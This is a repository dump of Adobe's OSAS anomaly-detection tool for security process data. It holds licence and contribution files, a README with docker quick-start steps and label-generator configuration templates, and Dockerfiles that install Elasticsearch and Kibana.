├── .gitignore
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── COPYRIGHT
├── LICENSE
├── README.md
├── docker
    ├── osas-elastic-jupyterlab
    │   └── Dockerfile
    └── osas-elastic
    │   └── Dockerfile
├── docs
    ├── PIPELINE_CONFIGURATION.md
    └── RULES.md
├── pyproject.toml
├── requirements.txt
├── resources
    └── .KEEP
├── scripts
    ├── config
    │   ├── elasticsearch.yml
    │   └── kibana.yml
    ├── run_services.sh
    └── tmp_data
    │   ├── data.tar.gz
    │   ├── json_uploader.py
    │   └── result_with_score.json
├── setup.py
└── src
    ├── __init__.py
    └── osas
        ├── __init__.py
        ├── api.py
        ├── cli.py
        ├── core
            ├── __init__.py
            ├── anomaly.py
            ├── interfaces.py
            ├── label_generators.py
            └── utils.py
        ├── etc
            ├── README.md
            ├── ad_config.conf
            ├── config.conf
            ├── data_config.conf
            └── label_config.conf
        ├── io_utils
            ├── __init__.py
            ├── config.py
            └── formatter.py
        ├── main
            ├── README.md
            ├── __init__.py
            ├── apply_rules.py
            ├── autoconfig.py
            ├── run_pipeline.py
            └── train_pipeline.py
        ├── models
            ├── __init__.py
            └── pipeline.py
        ├── pipeline
            ├── README.md
            ├── __init__.py
            ├── detect_anomalies.py
            ├── fetch_data.py
            ├── groom_data.py
            └── pipeline.py
        ├── templates
            ├── config_manual_update.html
            ├── config_static.txt
            ├── config_text_edit.html
            ├── console.html
            ├── generate_config.html
            ├── run_full_process.html
            ├── run_pipeline.html
            └── train_pipeline.html
        └── webserver.py


/.gitignore:
--------------------------------------------------------------------------------
 1 | dist/
 2 | build/
 3 | tests/
 4 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider
 5 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
 6 | corpus/
 7 | # User-specific stuff
 8 | data
 9 | .idea
10 | .idea/**/workspace.xml
11 | .idea/**/tasks.xml
12 | .idea/**/usage.statistics.xml
13 | .idea/**/dictionaries
14 | .idea/**/shelf
15 | 
16 | # Generated files
17 | .idea/**/contentModel.xml
18 | 
19 | # Sensitive or high-churn files
20 | .idea/**/dataSources/
21 | .idea/**/dataSources.ids
22 | .idea/**/dataSources.local.xml
23 | .idea/**/sqlDataSources.xml
24 | .idea/**/dynamic.xml
25 | .idea/**/uiDesigner.xml
26 | .idea/**/dbnavigator.xml
27 | 
28 | # Gradle
29 | .idea/**/gradle.xml
30 | .idea/**/libraries
31 | 
32 | # Gradle and Maven with auto-import
33 | # When using Gradle or Maven with auto-import, you should exclude module files,
34 | # since they will be recreated, and may cause churn.  Uncomment if using
35 | # auto-import.
36 | # .idea/artifacts
37 | # .idea/compiler.xml
38 | # .idea/jarRepositories.xml
39 | # .idea/modules.xml
40 | # .idea/*.iml
41 | # .idea/modules
42 | # *.iml
43 | # *.ipr
44 | 
45 | # CMake
46 | cmake-build-*/
47 | 
48 | # Mongo Explorer plugin
49 | .idea/**/mongoSettings.xml
50 | 
51 | # File-based project format
52 | *.iws
53 | 
54 | # IntelliJ
55 | out/
56 | 
57 | # mpeltonen/sbt-idea plugin
58 | .idea_modules/
59 | 
60 | # JIRA plugin
61 | atlassian-ide-plugin.xml
62 | 
63 | # Cursive Clojure plugin
64 | .idea/replstate.xml
65 | 
66 | # Crashlytics plugin (for Android Studio and IntelliJ)
67 | com_crashlytics_export_strings.xml
68 | crashlytics.properties
69 | crashlytics-build.properties
70 | fabric.properties
71 | 
72 | # Editor-based Rest Client
73 | .idea/httpRequests
74 | 
75 | # Android studio 3.1+ serialized cache file
76 | .idea/caches/build_file_checksums.ser
77 | *.pyc
78 | 
79 | *.DS_Store
80 | .DS_Store
81 | 
82 | dist/
83 | osas.egg-info/
84 | 


--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
 1 | # Adobe Code of Conduct
 2 | 
 3 | ## Our Pledge
 4 | 
 5 | In the interest of fostering an open and welcoming environment, we as
 6 | contributors and maintainers pledge to making participation in our project and
 7 | our community a harassment-free experience for everyone, regardless of age, body
 8 | size, disability, ethnicity, gender identity and expression, level of experience,
 9 | nationality, personal appearance, race, religion, or sexual identity and
10 | orientation.
11 | 
12 | ## Our Standards
13 | 
14 | Examples of behavior that contributes to creating a positive environment
15 | include:
16 | 
17 | * Using welcoming and inclusive language
18 | * Being respectful of differing viewpoints and experiences
19 | * Gracefully accepting constructive criticism
20 | * Focusing on what is best for the community
21 | * Showing empathy towards other community members
22 | 
23 | Examples of unacceptable behavior by participants include:
24 | 
25 | * The use of sexualized language or imagery and unwelcome sexual attention or
26 | advances
27 | * Trolling, insulting/derogatory comments, and personal or political attacks
28 | * Public or private harassment
29 | * Publishing others' private information, such as a physical or electronic
30 |   address, without explicit permission
31 | * Other conduct which could reasonably be considered inappropriate in a
32 |   professional setting
33 | 
34 | ## Our Responsibilities
35 | 
36 | Project maintainers are responsible for clarifying the standards of acceptable
37 | behavior and are expected to take appropriate and fair corrective action in
38 | response to any instances of unacceptable behavior.
39 | 
40 | Project maintainers have the right and responsibility to remove, edit, or
41 | reject comments, commits, code, wiki edits, issues, and other contributions
42 | that are not aligned to this Code of Conduct, or to ban temporarily or
43 | permanently any contributor for other behaviors that they deem inappropriate,
44 | threatening, offensive, or harmful.
45 | 
46 | ## Scope
47 | 
48 | This Code of Conduct applies both within project spaces and in public spaces
49 | when an individual is representing the project or its community. Examples of
50 | representing a project or community include using an official project e-mail
51 | address, posting via an official social media account, or acting as an appointed
52 | representative at an online or offline event. Representation of a project may be
53 | further defined and clarified by project maintainers.
54 | 
55 | ## Enforcement
56 | 
57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
58 | reported by contacting the project team at Grp-opensourceoffice@adobe.com. All
59 | complaints will be reviewed and investigated and will result in a response that
60 | is deemed necessary and appropriate to the circumstances. The project team is
61 | obligated to maintain confidentiality with regard to the reporter of an incident.
62 | Further details of specific enforcement policies may be posted separately.
63 | 
64 | Project maintainers who do not follow or enforce the Code of Conduct in good
65 | faith may face temporary or permanent repercussions as determined by other
66 | members of the project's leadership.
67 | 
68 | ## Attribution
69 | 
70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71 | available at [http://contributor-covenant.org/version/1/4][version]
72 | 
73 | [homepage]: http://contributor-covenant.org
74 | [version]: http://contributor-covenant.org/version/1/4/
75 | 


--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | # Contributing
 2 | 
 3 | Thanks for choosing to contribute!
 4 | 
 5 | The following are a set of guidelines to follow when contributing to this project.
 6 | 
 7 | ## Code Of Conduct
 8 | 
 9 | This project adheres to the Adobe [code of conduct](CODE_OF_CONDUCT.md). By participating, you are expected to uphold this code. Please report unacceptable behavior to Grp-opensourceoffice@adobe.com.
10 | 
11 | ## Contributor License Agreement
12 | 
13 | All third-party contributions to this project must be accompanied by a signed contributor license agreement. This gives Adobe permission to redistribute your contributions as part of the project. [Sign our CLA](http://opensource.adobe.com/cla.html). You only need to submit an Adobe CLA one time, so if you have submitted one previously, you are good to go!
14 | 
15 | ## Code Reviews
16 | 
17 | All submissions should come in the form of pull requests and need to be reviewed by project committers. Read [GitHub's pull request documentation](https://help.github.com/articles/about-pull-requests/) for more information on sending pull requests.
18 | 
19 | Lastly, please follow the [pull request template](.github/PULL_REQUEST_TEMPLATE.md) when submitting a pull request!
20 | 


--------------------------------------------------------------------------------
/COPYRIGHT:
--------------------------------------------------------------------------------
 1 | The following copyright message should appear at the top of all 
 2 | source files. This file can be removed from your repository.
 3 | 
 4 | Copyright (c) 2021 Adobe Systems Incorporated. All rights reserved.
 5 | 
 6 | Licensed under the Apache License, Version 2.0 (the "License");
 7 | you may not use this file except in compliance with the License.
 8 | You may obtain a copy of the License at
 9 | 
10 | http://www.apache.org/licenses/LICENSE-2.0
11 | 
12 | Unless required by applicable law or agreed to in writing, software
13 | distributed under the License is distributed on an "AS IS" BASIS,
14 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | See the License for the specific language governing permissions and
16 | limitations under the License.
17 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 |                                  Apache License
  2 |                            Version 2.0, January 2004
  3 |                         http://www.apache.org/licenses/
  4 | 
  5 |    TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
  6 | 
  7 |    1. Definitions.
  8 | 
  9 |       "License" shall mean the terms and conditions for use, reproduction,
 10 |       and distribution as defined by Sections 1 through 9 of this document.
 11 | 
 12 |       "Licensor" shall mean the copyright owner or entity authorized by
 13 |       the copyright owner that is granting the License.
 14 | 
 15 |       "Legal Entity" shall mean the union of the acting entity and all
 16 |       other entities that control, are controlled by, or are under common
 17 |       control with that entity. For the purposes of this definition,
 18 |       "control" means (i) the power, direct or indirect, to cause the
 19 |       direction or management of such entity, whether by contract or
 20 |       otherwise, or (ii) ownership of fifty percent (50%) or more of the
 21 |       outstanding shares, or (iii) beneficial ownership of such entity.
 22 | 
 23 |       "You" (or "Your") shall mean an individual or Legal Entity
 24 |       exercising permissions granted by this License.
 25 | 
 26 |       "Source" form shall mean the preferred form for making modifications,
 27 |       including but not limited to software source code, documentation
 28 |       source, and configuration files.
 29 | 
 30 |       "Object" form shall mean any form resulting from mechanical
 31 |       transformation or translation of a Source form, including but
 32 |       not limited to compiled object code, generated documentation,
 33 |       and conversions to other media types.
 34 | 
 35 |       "Work" shall mean the work of authorship, whether in Source or
 36 |       Object form, made available under the License, as indicated by a
 37 |       copyright notice that is included in or attached to the work
 38 |       (an example is provided in the Appendix below).
 39 | 
 40 |       "Derivative Works" shall mean any work, whether in Source or Object
 41 |       form, that is based on (or derived from) the Work and for which the
 42 |       editorial revisions, annotations, elaborations, or other modifications
 43 |       represent, as a whole, an original work of authorship. For the purposes
 44 |       of this License, Derivative Works shall not include works that remain
 45 |       separable from, or merely link (or bind by name) to the interfaces of,
 46 |       the Work and Derivative Works thereof.
 47 | 
 48 |       "Contribution" shall mean any work of authorship, including
 49 |       the original version of the Work and any modifications or additions
 50 |       to that Work or Derivative Works thereof, that is intentionally
 51 |       submitted to Licensor for inclusion in the Work by the copyright owner
 52 |       or by an individual or Legal Entity authorized to submit on behalf of
 53 |       the copyright owner. For the purposes of this definition, "submitted"
 54 |       means any form of electronic, verbal, or written communication sent
 55 |       to the Licensor or its representatives, including but not limited to
 56 |       communication on electronic mailing lists, source code control systems,
 57 |       and issue tracking systems that are managed by, or on behalf of, the
 58 |       Licensor for the purpose of discussing and improving the Work, but
 59 |       excluding communication that is conspicuously marked or otherwise
 60 |       designated in writing by the copyright owner as "Not a Contribution."
 61 | 
 62 |       "Contributor" shall mean Licensor and any individual or Legal Entity
 63 |       on behalf of whom a Contribution has been received by Licensor and
 64 |       subsequently incorporated within the Work.
 65 | 
 66 |    2. Grant of Copyright License. Subject to the terms and conditions of
 67 |       this License, each Contributor hereby grants to You a perpetual,
 68 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 69 |       copyright license to reproduce, prepare Derivative Works of,
 70 |       publicly display, publicly perform, sublicense, and distribute the
 71 |       Work and such Derivative Works in Source or Object form.
 72 | 
 73 |    3. Grant of Patent License. Subject to the terms and conditions of
 74 |       this License, each Contributor hereby grants to You a perpetual,
 75 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 76 |       (except as stated in this section) patent license to make, have made,
 77 |       use, offer to sell, sell, import, and otherwise transfer the Work,
 78 |       where such license applies only to those patent claims licensable
 79 |       by such Contributor that are necessarily infringed by their
 80 |       Contribution(s) alone or by combination of their Contribution(s)
 81 |       with the Work to which such Contribution(s) was submitted. If You
 82 |       institute patent litigation against any entity (including a
 83 |       cross-claim or counterclaim in a lawsuit) alleging that the Work
 84 |       or a Contribution incorporated within the Work constitutes direct
 85 |       or contributory patent infringement, then any patent licenses
 86 |       granted to You under this License for that Work shall terminate
 87 |       as of the date such litigation is filed.
 88 | 
 89 |    4. Redistribution. You may reproduce and distribute copies of the
 90 |       Work or Derivative Works thereof in any medium, with or without
 91 |       modifications, and in Source or Object form, provided that You
 92 |       meet the following conditions:
 93 | 
 94 |       (a) You must give any other recipients of the Work or
 95 |           Derivative Works a copy of this License; and
 96 | 
 97 |       (b) You must cause any modified files to carry prominent notices
 98 |           stating that You changed the files; and
 99 | 
100 |       (c) You must retain, in the Source form of any Derivative Works
101 |           that You distribute, all copyright, patent, trademark, and
102 |           attribution notices from the Source form of the Work,
103 |           excluding those notices that do not pertain to any part of
104 |           the Derivative Works; and
105 | 
106 |       (d) If the Work includes a "NOTICE" text file as part of its
107 |           distribution, then any Derivative Works that You distribute must
108 |           include a readable copy of the attribution notices contained
109 |           within such NOTICE file, excluding those notices that do not
110 |           pertain to any part of the Derivative Works, in at least one
111 |           of the following places: within a NOTICE text file distributed
112 |           as part of the Derivative Works; within the Source form or
113 |           documentation, if provided along with the Derivative Works; or,
114 |           within a display generated by the Derivative Works, if and
115 |           wherever such third-party notices normally appear. The contents
116 |           of the NOTICE file are for informational purposes only and
117 |           do not modify the License. You may add Your own attribution
118 |           notices within Derivative Works that You distribute, alongside
119 |           or as an addendum to the NOTICE text from the Work, provided
120 |           that such additional attribution notices cannot be construed
121 |           as modifying the License.
122 | 
123 |       You may add Your own copyright statement to Your modifications and
124 |       may provide additional or different license terms and conditions
125 |       for use, reproduction, or distribution of Your modifications, or
126 |       for any such Derivative Works as a whole, provided Your use,
127 |       reproduction, and distribution of the Work otherwise complies with
128 |       the conditions stated in this License.
129 | 
130 |    5. Submission of Contributions. Unless You explicitly state otherwise,
131 |       any Contribution intentionally submitted for inclusion in the Work
132 |       by You to the Licensor shall be under the terms and conditions of
133 |       this License, without any additional terms or conditions.
134 |       Notwithstanding the above, nothing herein shall supersede or modify
135 |       the terms of any separate license agreement you may have executed
136 |       with Licensor regarding such Contributions.
137 | 
138 |    6. Trademarks. This License does not grant permission to use the trade
139 |       names, trademarks, service marks, or product names of the Licensor,
140 |       except as required for reasonable and customary use in describing the
141 |       origin of the Work and reproducing the content of the NOTICE file.
142 | 
143 |    7. Disclaimer of Warranty. Unless required by applicable law or
144 |       agreed to in writing, Licensor provides the Work (and each
145 |       Contributor provides its Contributions) on an "AS IS" BASIS,
146 |       WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 |       implied, including, without limitation, any warranties or conditions
148 |       of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 |       PARTICULAR PURPOSE. You are solely responsible for determining the
150 |       appropriateness of using or redistributing the Work and assume any
151 |       risks associated with Your exercise of permissions under this License.
152 | 
153 |    8. Limitation of Liability. In no event and under no legal theory,
154 |       whether in tort (including negligence), contract, or otherwise,
155 |       unless required by applicable law (such as deliberate and grossly
156 |       negligent acts) or agreed to in writing, shall any Contributor be
157 |       liable to You for damages, including any direct, indirect, special,
158 |       incidental, or consequential damages of any character arising as a
159 |       result of this License or out of the use or inability to use the
160 |       Work (including but not limited to damages for loss of goodwill,
161 |       work stoppage, computer failure or malfunction, or any and all
162 |       other commercial damages or losses), even if such Contributor
163 |       has been advised of the possibility of such damages.
164 | 
165 |    9. Accepting Warranty or Additional Liability. While redistributing
166 |       the Work or Derivative Works thereof, You may choose to offer,
167 |       and charge a fee for, acceptance of support, warranty, indemnity,
168 |       or other liability obligations and/or rights consistent with this
169 |       License. However, in accepting such obligations, You may act only
170 |       on Your own behalf and on Your sole responsibility, not on behalf
171 |       of any other Contributor, and only if You agree to indemnify,
172 |       defend, and hold each Contributor harmless for any liability
173 |       incurred by, or claims asserted against, such Contributor by reason
174 |       of your accepting any such warranty or additional liability.
175 | 
176 |    END OF TERMS AND CONDITIONS
177 | 
178 |    APPENDIX: How to apply the Apache License to your work.
179 | 
180 |       To apply the Apache License to your work, attach the following
181 |       boilerplate notice, with the fields enclosed by brackets "{}"
182 |       replaced with your own identifying information. (Don't include
183 |       the brackets!)  The text should be enclosed in the appropriate
184 |       comment syntax for the file format. We also recommend that a
185 |       file or class name and description of purpose be included on the
186 |       same "printed page" as the copyright notice for easier
187 |       identification within third-party archives.
188 | 
189 |    Copyright {yyyy} {name of copyright owner}
190 | 
191 |    Licensed under the Apache License, Version 2.0 (the "License");
192 |    you may not use this file except in compliance with the License.
193 |    You may obtain a copy of the License at
194 | 
195 |        http://www.apache.org/licenses/LICENSE-2.0
196 | 
197 |    Unless required by applicable law or agreed to in writing, software
198 |    distributed under the License is distributed on an "AS IS" BASIS,
199 |    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 |    See the License for the specific language governing permissions and
201 |    limitations under the License.
202 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # One Stop Anomaly Shop (OSAS)
  2 | 
  3 | This repository implements the models, methods and techniques presented in our paper: [A Principled Approach to Enriching Security-related Data for Running Processes through Statistics and Natural Language Processing](https://www.scitepress.org/Papers/2021/103814/103814.pdf).
  4 | 
  5 | ## Introduction video (follows quick start guide)
  6 | 
  7 | This video is a recording of our Hack In The Box (HITB) Security Conference 2021 Amsterdam presentation.
  8 | 
  9 | [![IMAGE ALT TEXT HERE](https://img.youtube.com/vi/Wi5NXGzsFC4/0.jpg)](https://www.youtube.com/watch?v=Wi5NXGzsFC4)]
 10 | 
 11 | ## Quick start guide
 12 | 
 13 | **Step 1:** Get/build the docker image
 14 | 
 15 | ***Option 1:*** Use precompiled image (might not reflect latest changes):
 16 | 
 17 | ```shell
 18 | docker pull tiberiu44/osas:latest
 19 | docker image tag tiberiu44/osas:latest osas:latest
 20 | ```
 21 | 
 22 | ***Option 2:*** Build the image locally
 23 | 
 24 | ```shell
 25 | git clone https://github.com/adobe/OSAS.git
 26 | cd OSAS
 27 | docker build . -f docker/osas-elastic/Dockerfile -t osas:latest
 28 | ```
 29 | 
 30 | **Step 2:** After building the docker image you can start OSAS by typing:
 31 | 
 32 | ```shell
 33 | docker run -p 8888:8888/tcp -p 5601:5601/tcp -v <ABSOLUTE PATH TO DATA FOLDER>:/app osas
 34 | ```
 35 | 
 36 | **IMPORTANT NOTE:** Please modify the above command by adding the absolute path to your datafolder in the appropiate location
 37 | 
 38 | After OSAS has started (it might take 1-2 minutes) you can use your browser to access some standard endpoints:
 39 | * [http://localhost:5601/app/home#/](http://localhost:5601/app/home#/) - access to Kibana frontend (this is where you will see your data)
 40 | * [http://localhost:8888/?token=osas](http://localhost:8888/?token=osas) - access to Jupyter Lab (open Terminal or create a Notebook)
 41 | 
 42 | For Debug (in case you need to):
 43 | 
 44 | ```shell
 45 | docker run -p 8888:8888/tcp -p 5601:5601/tcp -v <ABSOLUTE PATH TO DATA FOLDER>:/app -ti osas /bin/bash
 46 | ```
 47 | 
 48 | ## Building the test pipeline
 49 | 
 50 | This guide will take you through all the necessary steps to configure, train and run your own pipeline on your own dataset.
 51 | 
 52 | **Prerequisite**: Add you own CSV dataset into your data-folder (the one provided in the `docker run` command)
 53 | 
 54 | Once you started your docker image, use the [OSAS console](http://localhost:8888/osas/console) to gain CLI access to all the tools.
 55 | 
 56 | In what follows, we assume that your dataset is called `dataset.csv`. Please update the commands as necessary in case you use a different name/location.
 57 | 
 58 | **Be sure you are running scripts in the root folder of OSAS:**
 59 | 
 60 | ```bash
 61 | cd /osas
 62 | ```
 63 | **Step 1:** Build a custom pipeline configuration file - this can be done fully manually on by bootstraping using our conf autogenerator script:
 64 | ```bash
 65 | python3 osas/main/autoconfig.py --input-file=/app/dataset.csv --output-file=/app/dataset.conf
 66 | ```
 67 | 
 68 | The above command will generate a custom configuration file for your dataset. It will try guess field types and optimal combinations between fields. You can edit the generated file (which should be available in the shared data-folder), using your favourite editor.
 69 | 
 70 | Standard templates for label generator types are:
 71 | 
 72 | ```editorconfig
 73 | [LG_MULTINOMIAL]
 74 | generator_type = MultinomialField
 75 | field_name = <FIELD_NAME>
 76 | absolute_threshold = 10
 77 | relative_threshold = 0.1
 78 | group_by = None # this is an optional field - it can be a single attribute name or a list of names
 79 | 
 80 | [LG_TEXT]
 81 | generator_type = TextField
 82 | field_name = <FIELD_NAME>
 83 | lm_mode = char
 84 | ngram_range = (3, 5)
 85 | 
 86 | [LG_NUMERIC]
 87 | generator_type = NumericField
 88 | field_name = <FIELD_NAME>
 89 | group_by = None # this is an optional field - it can be a single attribute name or a list of names
 90 | 
 91 | [LG_MUTLINOMIAL_COMBINER]
 92 | generator_type = MultinomialFieldCombiner
 93 | field_names = ['<FIELD_1>', '<FIELD_2>', ...]
 94 | absolute_threshold = 10
 95 | relative_threshold = 0.1
 96 | group_by = None # this is an optional field - it can be a single attribute name or a list of names
 97 | 
 98 | [LG_KEYWORD]
 99 | generator_type = KeywordBased
100 | field_name = <FIELD_NAME>
101 | keyword_list = ['<KEYWORD_1>', '<KEYWORD_2>', '<KEYWORD_3>', ...]
102 | 
103 | [LG_REGEX]
104 | generator_type = KnowledgeBased
105 | field_name = <FIELD_NAME>
106 | rules_and_labels_tuple_list = [('<REGEX_1>','<LABEL_1>'), ('<REGEX_2>','<LABEL_2>'), ...]
107 | ```
108 | 
109 | You can use the above templates to add as many label generators you want. Just make sure that the header IDs are unique in the configuration file.
110 | 
111 | **Step 2:** Train the pipeline
112 | 
113 | ```bash
114 | python3 osas/main/train_pipeline.py --conf-file=/app/dataset.conf --input-file=/app/dataset.csv --model-file=/app/dataset.json
115 | ```
116 | 
117 | The above command will generate a pretrained pipeline using the previously created configuration file and the dataset
118 | 
119 | **Step 3:** Run the pipeline on a dataset 
120 | 
121 | ```bash
122 | python3 osas/main/run_pipeline.py --conf-file=/app/dataset.conf --model-file=/app/dataset.json --input-file=/app/dataset.csv --output-file=/app/dataset-out.csv
123 | ```
124 | 
125 | The above command will run the pretrained pipeline on any compatible dataset. In the example we run the pipeline on the training data, but you can use previously unseen data. It will generate an output file with labels and anomaly scores and it will also import your data into Elasticsearch/Kibana. To view the result just use the the [web interface](http://localhost:5601/app/dashboards).
126 | 
127 | # Developing models
128 | 
129 | Now that everything is up and running, we prepared a set of development guidelines that will help you apply OSAS on your own dataset:
130 | 
131 | 1. [Pipeline configuration](docs/PIPELINE_CONFIGURATION.md): This will help you understand how the label generators and anomaly scoring works in OSAS;
132 | 2. [Rule-based score modifiers and labeling](docs/RULES.md): Once you have a working OSAS pipeline, you can furhter refine your results by adding new labels and modifying the anomaly scoring based on static rules.
133 | 
134 | # Citing and attribution
135 | 
136 | **Full-text-paper: [A Principled Approach to Enriching Security-related Data for Running Processes through Statistics and Natural Language Processing](https://www.scitepress.org/Papers/2021/103814/103814.pdf).**
137 | 
138 | If you want to use this repository in any academic work, please cite the following work:
139 | 
140 | **MLA**
141 |   * Boros, Tiberiu, et al. ‘A Principled Approach to Enriching Security-Related Data for Running Processes through Statistics and Natural Language Processing’. IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security, 2021.
142 | 
143 | **APA**
144 |   * Boros, T., Cotaie, A., Vikramjeet, K., Malik, V., Park, L., & Pachis, N. (2021). A principled approach to enriching security-related data for running processes through statistics and natural language processing. IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security. 
145 | 
146 | **Chicago**
147 |   * Boros, Tiberiu, Andrei Cotaie, Kumar Vikramjeet, Vivek Malik, Lauren Park, and Nick Pachis. ‘A Principled Approach to Enriching Security-Related Data for Running Processes through Statistics and Natural Language Processing’. In IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security, 2021.
148 |     
149 | **BibTeX**
150 | 
151 | ```text
152 | @article{boros2021principled,
153 |   title={A Principled Approach to Enriching Security-related Data for Running Processes through Statistics and Natural Language Processing},
154 |   author={Boros, Tiberiu and Cotaie, Andrei and Vikramjeet, Kumar and Malik, Vivek and Park, Lauren and Pachis, Nick},
155 |   year={2021},
156 |   booktitle={IoTBDS 2021 - 6th International Conference on Internet of Things, Big Data and Security}
157 | }
158 | ```


--------------------------------------------------------------------------------
/docker/osas-elastic-jupyterlab/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM debian
 2 | ENV APT_KEY_DONT_WARN_ON_DANGEROUS_USAGE=1
 3 | RUN apt update && apt install -y gnupg2 curl procps openjdk-11-jdk unzip wget dbus sudo
 4 | RUN DEBIAN_FRONTEND=noninteractive apt-get install -y locales python3 python3-pip mc nano htop git
 5 | 
 6 | RUN wget -qO - https://d3g5vo6xdbdb9a.cloudfront.net/GPG-KEY-opendistroforelasticsearch | apt-key add -
 7 | RUN echo "deb https://d3g5vo6xdbdb9a.cloudfront.net/apt stable main" | tee -a   /etc/apt/sources.list.d/opendistroforelasticsearch.list
 8 | RUN wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-7.10.2-amd64.deb && \
 9 |     dpkg -i elasticsearch-oss-7.10.2-amd64.deb && \
10 |     rm elasticsearch-oss-7.10.2-amd64.deb
11 | 
12 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistro-elasticsearch/opendistroforelasticsearch-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
13 |     tar -zxf opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
14 |     rm opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
15 |     mv opendistroforelasticsearch-1.13.0 /elasticsearch && \
16 |     chown elasticsearch:elasticsearch elasticsearch -R && \
17 |     cd /elasticsearch && \
18 |     sudo -H -u elasticsearch bash -c './opendistro-tar-install.sh &'
19 | 
20 | RUN curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add -
21 | RUN echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-7.x.list
22 | RUN apt update
23 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistroforelasticsearch-kibana/opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
24 |     tar -xf opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
25 |     rm opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz
26 | 
27 | # Prepare environment UTF-8
28 | RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \
29 |     locale-gen
30 | ENV LANG en_US.UTF-8
31 | ENV LANGUAGE en_US:en
32 | ENV LC_ALL en_US.UTF-8
33 | 
34 | #RUN echo "Cloning OSAS" && \
35 | #    cd / && \
36 | #    git clone https://github.com/adobe/OSAS.git && \
37 | #    mv OSAS osas
38 | ADD ./osas /osas/osas
39 | ADD ./docs /osas/docs
40 | ADD ./scripts /osas/scripts
41 | ADD ./resources /osas/resources
42 | RUN mkdir osas/corpus
43 | RUN mkdir osas/data
44 | COPY ./requirements.txt /osas/
45 | 
46 | RUN cd /osas/ && \
47 |     cat requirements.txt
48 | 
49 | RUN cd /osas/ && \
50 |     cat requirements.txt && \
51 |     pip3 install -U pip && \
52 |     pip3 install --no-cache-dir -r requirements.txt && \
53 |     pip3 install jupyterlab
54 | 
55 | ENV SHELL=/bin/bash
56 | 
57 | CMD /osas/scripts/run_services.sh & jupyter lab --ip=0.0.0.0 --allow-root --ServerApp.token=osas # & cd /osas && python3 osas/webserver.py
58 | 
59 | 


--------------------------------------------------------------------------------
/docker/osas-elastic/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM debian
 2 | ENV APT_KEY_DONT_WARN_ON_DANGEROUS_USAGE=1
 3 | RUN apt update && apt install -y gnupg2 curl procps openjdk-11-jdk unzip wget dbus sudo
 4 | 
 5 | RUN wget -qO - https://d3g5vo6xdbdb9a.cloudfront.net/GPG-KEY-opendistroforelasticsearch | apt-key add -
 6 | RUN echo "deb https://d3g5vo6xdbdb9a.cloudfront.net/apt stable main" | tee -a   /etc/apt/sources.list.d/opendistroforelasticsearch.list
 7 | RUN wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-7.10.2-amd64.deb && \
 8 |     dpkg -i elasticsearch-oss-7.10.2-amd64.deb && \
 9 |     rm elasticsearch-oss-7.10.2-amd64.deb
10 | 
11 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistro-elasticsearch/opendistroforelasticsearch-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
12 |     tar -zxf opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
13 |     rm opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
14 |     mv opendistroforelasticsearch-1.13.0 /elasticsearch && \
15 |     chown elasticsearch:elasticsearch elasticsearch -R && \
16 |     cd /elasticsearch && \
17 |     sudo -H -u elasticsearch bash -c './opendistro-tar-install.sh &'
18 | 
19 | RUN curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add -
20 | RUN echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-7.x.list
21 | RUN apt update
22 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistroforelasticsearch-kibana/opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
23 |     tar -xf opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
24 |     rm opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz
25 | 
26 | # Prepare environment UTF-8
27 | RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y locales python3 python3-pip mc nano htop git
